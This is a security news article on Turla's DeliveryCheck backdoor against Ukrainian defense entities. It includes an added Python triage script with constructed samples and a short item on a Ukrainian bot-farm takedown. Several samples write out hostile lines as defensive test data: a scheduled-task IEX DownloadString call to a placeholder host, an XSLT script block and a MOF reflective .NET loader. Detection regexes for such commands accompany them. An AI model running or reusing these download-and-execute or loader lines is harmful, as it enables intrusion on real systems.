Backdoor Malware Used Against Ukrainian Defense Entities
A new .NET-based backdoor, named DeliveryCheck (also tracked as CAPIBAR or GAMEDAY), has been identified targeting the defense sector in Ukraine and Eastern Europe. The backdoor's core function is to stage and deliver follow-on payloads.
The attacks have been attributed to the Russian nation-state actor Turla, which is tracked under names including Iron Hunter, Secret Blizzard (formerly Krypton), Uroburos, Venomous Bear, and Waterbug, and is assessed to be linked to Russia's Federal Security Service (FSB). DeliveryCheck is distributed by email as documents carrying malicious macros. Once the macro runs, the backdoor persists through a scheduled task that downloads it and executes it in memory, so no persistent payload file needs to stay on disk. It then contacts a command-and-control (C2) server to retrieve tasks, including launching arbitrary payloads embedded in XSLT stylesheets.
Initial Attack Uses Kazuar Implant
In some instances, initial access is accompanied by the deployment of Kazuar, a known Turla implant. Kazuar can steal application configuration files, event logs, and data from web browsers. The main objective of these attacks is to exfiltrate messages from the Signal Desktop app on Windows, giving the adversaries access to sensitive conversations, documents, and images on the targeted systems.
A notable aspect of DeliveryCheck is a server-side component installed on compromised Microsoft Exchange servers using PowerShell Desired State Configuration (DSC), a platform for automated configuration of Windows systems. DSC is used to generate a Managed Object Format (MOF) file containing a PowerShell script that loads the embedded .NET payload into memory, effectively turning a legitimate server into a malware C2 center. Because DSC is a built-in administrative feature, this abuse blends in with normal configuration management activity.
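The three artifacts described above (a scheduled task that downloads and runs PowerShell in memory, an XSLT stylesheet carrying an executable script block, and a DSC MOF document whose script loads a .NET assembly) each leave a file a defender can triage. The following script is an added example written for this page; it is not code from the original article, from Microsoft, or from CERT-UA, and the indicator lists, the sample task XML, stylesheet and MOF are all constructed here for illustration rather than taken from the real DeliveryCheck samples. It assumes the XSLT payload is embedded as an msxsl:script block (one common way to put executable code in a stylesheet) and that the DSC loader lives in a Script resource's SetScript property; both are assumptions about how such a payload could be packaged, not a description of the actual malware.

```python
"""Triage helpers for scheduled-task, XSLT and DSC MOF artifacts.

All samples below are constructed for this example. The regexes are
heuristic indicators chosen by the author, not published IOCs.
"""
import re
import xml.etree.ElementTree as ET

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
MSXSL_NS = "{urn:schemas-microsoft-com:xslt}"

# Download-and-execute indicators in PowerShell arguments (heuristic list).
DOWNLOAD_EXEC = re.compile(
    r"DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
    r"Invoke-Expression|\biex\b|-EncodedCommand|-enc\b",
    re.IGNORECASE,
)
# Reflective .NET loading indicators inside a DSC script (heuristic list).
NET_LOADER = re.compile(
    r"Reflection\.Assembly\]::Load|FromBase64String", re.IGNORECASE
)
# One `Name = "value";` property line of a MOF instance block.
MOF_PROP = re.compile(r'^\s*(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"\s*;', re.MULTILINE)


def scan_task_xml(xml_text):
    """Return (command, arguments) pairs for Exec actions that launch
    PowerShell with download-and-execute style arguments."""
    root = ET.fromstring(xml_text)
    hits = []
    for exe in root.iter(f"{TASK_NS}Exec"):
        cmd = (exe.findtext(f"{TASK_NS}Command") or "").strip()
        args = exe.findtext(f"{TASK_NS}Arguments") or ""
        if re.search(r"powershell|pwsh", cmd, re.IGNORECASE) and DOWNLOAD_EXEC.search(args):
            hits.append((cmd, args))
    return hits


def scan_xslt(xml_text):
    """Return the language of every msxsl:script block in a stylesheet.
    MSXML defaults the language to JScript when the attribute is absent."""
    root = ET.fromstring(xml_text)
    return [s.get("language", "JScript") for s in root.iter(f"{MSXSL_NS}script")]


def scan_mof(mof_text):
    """Return DSC Script-resource properties whose value looks like a .NET loader."""
    hits = []
    for name, value in MOF_PROP.findall(mof_text):
        if name in ("GetScript", "TestScript", "SetScript") and NET_LOADER.search(value):
            hits.append(name)
    return hits


# --- constructed samples (not real malware artifacts) ---
TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions>
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"</Arguments>
    </Exec>
  </Actions>
</Task>"""

BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions>
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-ExecutionPolicy Bypass -File C:\Scripts\cleanup.ps1</Arguments>
    </Exec>
  </Actions>
</Task>"""

XSLT_WITH_SCRIPT = r"""<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="urn:user">
  <msxsl:script language="C#" implements-prefix="user">
    public string Run() { return "stage"; }
  </msxsl:script>
  <xsl:template match="/"><xsl:value-of select="user:Run()"/></xsl:template>
</xsl:stylesheet>"""

MOF_WITH_LOADER = r"""instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
 ResourceID = "[Script]Loader";
 GetScript = "@{}";
 TestScript = "$false";
 SetScript = "[System.Reflection.Assembly]::Load([Convert]::FromBase64String('TVqQAAMA')).EntryPoint.Invoke($null, $null)";
 ModuleName = "PSDesiredStateConfiguration";
 ModuleVersion = "1.0";
};"""

if __name__ == "__main__":
    print("task actions:", scan_task_xml(TASK_XML), scan_task_xml(BENIGN_TASK_XML))
    print("xslt script languages:", scan_xslt(XSLT_WITH_SCRIPT))
    print("mof loader properties:", scan_mof(MOF_WITH_LOADER))
```

In practice the inputs come from exported task definitions under the Tasks folder of the Windows directory, stylesheets recovered from the backdoor's C2 traffic or process memory, and the MOF documents DSC keeps in its configuration directory; the heuristics are deliberately loose and are meant to surface candidates for a human to confirm, not to serve as a signature.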
Ukraine Takes Down Propaganda Bot Farm
In parallel, the Cyber Police of Ukraine dismantled a large-scale bot farm involving more than 100 individuals who spread hostile propaganda justifying the Russian invasion. The group also leaked personal information belonging to Ukrainian citizens and ran various fraud schemes. As part of the operation, searches were conducted at 21 locations, resulting in the seizure of computer equipment, mobile phones, over 250 GSM gateways, and about 150,000 SIM cards from different mobile operators.